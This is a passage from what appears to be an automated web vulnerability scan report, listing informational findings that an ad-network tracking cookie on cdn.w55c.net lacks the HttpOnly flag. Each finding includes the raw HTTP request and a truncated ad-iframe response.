GET /i/0REyoPRMSz_696710848.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAFoYUK5XeVIQpujIjD7cILBOkoQIpRdg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502354&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502359&frm=1&adk=513358139&ga_vid=2102368488.1303658502&ga_sid=1303658502&ga_hid=1386538034&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:21:40 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:19:55 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:04:45 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6961

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV
...[SNIP]...

18.231. http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RFFcWpaTN_954073853.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RFFcWpaTN_954073853.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAIEK0K5YNMOLob9Z6R4rJH8FZ3KUYu1A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZGeVp3NFpBSg&ciu=MFJGRmNXcGFUTg&reqid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=503&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516518&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516523&frm=1&adk=513358139&ga_vid=1030430259.1303658517&ga_sid=1303658517&ga_hid=340899808&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:29:54 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 15 Mar 2011 22:27:10 GMT
Date: Sun, 24 Apr 2011 15:22:04 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1172

<IFRAME SRC="http://ad.doubleclick.net/adi/N5315.158901.DATAXU/B5334493.10;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEV
...[SNIP]...

18.232. http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RHDjk2rJk_401783982.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RHDjk2rJk_401783982.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkZ8R0ZkTjZCUkZycHwxMzAzNjU4NjU0MDYyfDF8MEY5SUVVUHozanwwUkhEamsyckprfEVYXzEwMjM0NzcyMDZ8MjY2NzYw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAnAAAhwgK5WeiMK0_v1fWmDwcBhlvtoikzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5SUVVUHozag&ciu=MFJIRGprMnJKaw&reqid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=266&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676654&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658654961&bpp=7&shv=r20110420&jsv=r20110415&correlator=1303658654970&frm=1&adk=513358139&ga_vid=37961730.1303658655&ga_sid=1303658655&ga_hid=329915175&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=36813006%2C33895132&fu=4&ifi=1&dtd=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:19 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:08:39 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 29 Mar 2011 15:55:16 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 2684

<iframe src="http://altfarm.mediaplex.com/ad/fm/14302-119028-29115-1?mpt=[CACHEBUSTER]&mpvc=" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor=
...[SNIP]...

18.233. http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RNYnkg2EM_1392081529.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDNGQjMwMDBDNUE5MjBBRTU4MzA4MUY2QjcxOTl8R0ZqRXJKdHl0MHwxMzAzNjU4NDIxODU1fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUwMTk3&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_swAMWpIK5YMIH2txmb8GB__on5K2_4iSvA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjMwMDBDNUE5MjBBRTU4MzA4MUY2QjcxOTk&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=150&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676422&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658422794&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658422802&frm=1&adk=2614322350&ga_vid=1769074993.1303658423&ga_sid=1303658423&ga_hid=1301346497&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:21 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:19:56 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 30 Mar 2011 19:16:30 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 420

<iframe src="http://altfarm.mediaplex.com/ad/fm/3992-125865-29115-1?mpt=[CACHEBUSTER]&mpvc=" width=160 height=600 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor=
...[SNIP]...

18.234. http://cdn.w55c.net/i/0ROvzxEJNe_571009919.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0ROvzxEJNe_571009919.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0ROvzxEJNe_571009919.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODJ8R0ZGdXp2Y2ttQnwxMzAzNjYxODcyNjkyfDF8MEZCWWt3ZjdTV3wwUk92enhFSk5lfEVYXzEwMjM0NzcyMDZ8NTcwMDA0&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNLgAJ-Z4K5X1DKQVTggYCu04PFXSP5d7SLQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZCWWt3ZjdTVw&ciu=MFJPdnp4RUpOZQ&reqid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=570&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679873&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661873586&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661873599&frm=1&adk=2614322350&ga_vid=1404053174.1303661874&ga_sid=1303661874&ga_hid=824907956&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=19
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:15:59 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:17:52 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 11 Apr 2011 17:52:03 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 113
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061002 (MII-APC/1.6)
Content-Length: 732

<iframe id='a3cde47f' name='a3cde47f' src='http://d.w55c.net/afr.php?zoneid=790&amp;cb=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODJ8R0ZGdXp2Y2ttQnwxMzAzNjYxODcyNjkyfDF8MEZCWWt3ZjdTV3wwUk92enhFSk5lfEVYX
...[SNIP]...

18.235. http://cdn.w55c.net/i/0RW21p2fqU_270915107.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RW21p2fqU_270915107.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RW21p2fqU_270915107.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDZ8R0ZFcnBoektNWXwxMzAzNjYyNjQ4NDE3fDF8MEZjSUxxQkZUb3wwUlcyMXAyZnFVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDI1MjE4NQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQNgAFoToK7FcQpbsDBuQ7j9zay5ySEgzsXw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZjSUxxQkZUbw&ciu=MFJXMjFwMmZxVQ&reqid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=252&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680649&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662649299&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303662649303&frm=1&adk=2614322350&ga_vid=278906705.1303662649&ga_sid=1303662649&ga_hid=1493962260&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36815001&fu=4&ifi=1&dtd=6
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:30:47 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:01:50 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 20 Apr 2011 21:25:08 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 810

<iframe id='adcfce52' name='adcfce52' src='http://d.w55c.net/afr.php?zoneid=750&amp;cb=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDZ8R0ZFcnBoektNWXwxMzAzNjYyNjQ4NDE3fDF8MEZjSUxxQkZUb3wwUlcyMXAyZnFVfDlRU
...[SNIP]...

18.236. http://cdn.w55c.net/i/0RZieDDeGI_308736425.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RZieDDeGI_308736425.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RZieDDeGI_308736425.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQjAANb_wK7GYTuv9w7qr-ELGqjb86HRtR-A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZZWG9GdFhPUQ&ciu=MFJaaWVERGVHSQ&reqid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=205&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680735&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662735800&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662735812&frm=1&adk=2614322350&ga_vid=273036336.1303662736&ga_sid=1303662736&ga_hid=1991820173&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:32:14 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:30:15 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 29 Mar 2011 15:51:31 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 3553

<IFRAME SRC="http://ad.doubleclick.net/adi/N5762.158901.DATAXU/B4799014.12;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfD
...[SNIP]...

18.237. http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RaZHwYk2m_562981296.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RaZHwYk2m_562981296.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAkQAN6vYK5X_NOLUzcqM_ssWL-1bQiOIurQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZKak0yUU5jSw&ciu=MFJhWkh3WWsybQ&reqid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=467&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676644&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658644881&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658644887&frm=1&adk=513358139&ga_vid=1984226007.1303658645&ga_sid=1303658645&ga_hid=40124116&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:18 GMT
